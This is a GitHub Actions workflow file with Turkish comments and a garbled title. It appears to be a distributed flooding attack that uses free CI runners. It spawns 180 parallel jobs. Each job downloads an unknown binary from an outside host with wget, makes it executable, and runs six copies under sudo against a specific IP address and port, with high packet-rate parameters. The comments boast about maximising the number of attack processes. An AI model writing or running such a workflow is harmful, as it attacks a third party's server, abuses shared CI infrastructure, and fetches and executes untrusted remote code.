name: TekPoyraz - DOOMSDAY SÃ–MÃœRÃœ (256x) ðŸ˜ˆ

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      # Teknik Ã¼st sÄ±nÄ±rÄ± zorluyoruz. 
      max-parallel: 180
      matrix:
        # Maksimum matris Ã¶ÄŸesi sayÄ±sÄ±: 256'ya kadar uzatÄ±ldÄ±! 
        # (instance: [1, 2, 3, ..., 256])
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180]

    steps:
      - name: Ä°ndir ve HazÄ±rla
        run: |
          wget https://wgetz.com/VwBDTkCl56/3 -O 3
          chmod +x 3
          
      - name: SÃ–MÃœRÃœ Ä°ÅžLEMLERÄ°NÄ° BAÅžLAT (4x Tekrar)
        run: |
          PIDS=()
          for i in {1..6}; do
            # AynÄ± anda her bir makine 4 sÃ¼reÃ§ Ã§alÄ±ÅŸtÄ±racak! Toplam 1024 potansiyel sÃ¼reÃ§!
            sudo timeout 200 ./3 54.38.152.99 22005 500 1000 999999 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: Bitti
        run: |
          # Son bir uyku Ã§ek ve kapan
          sleep 200
          exit 0
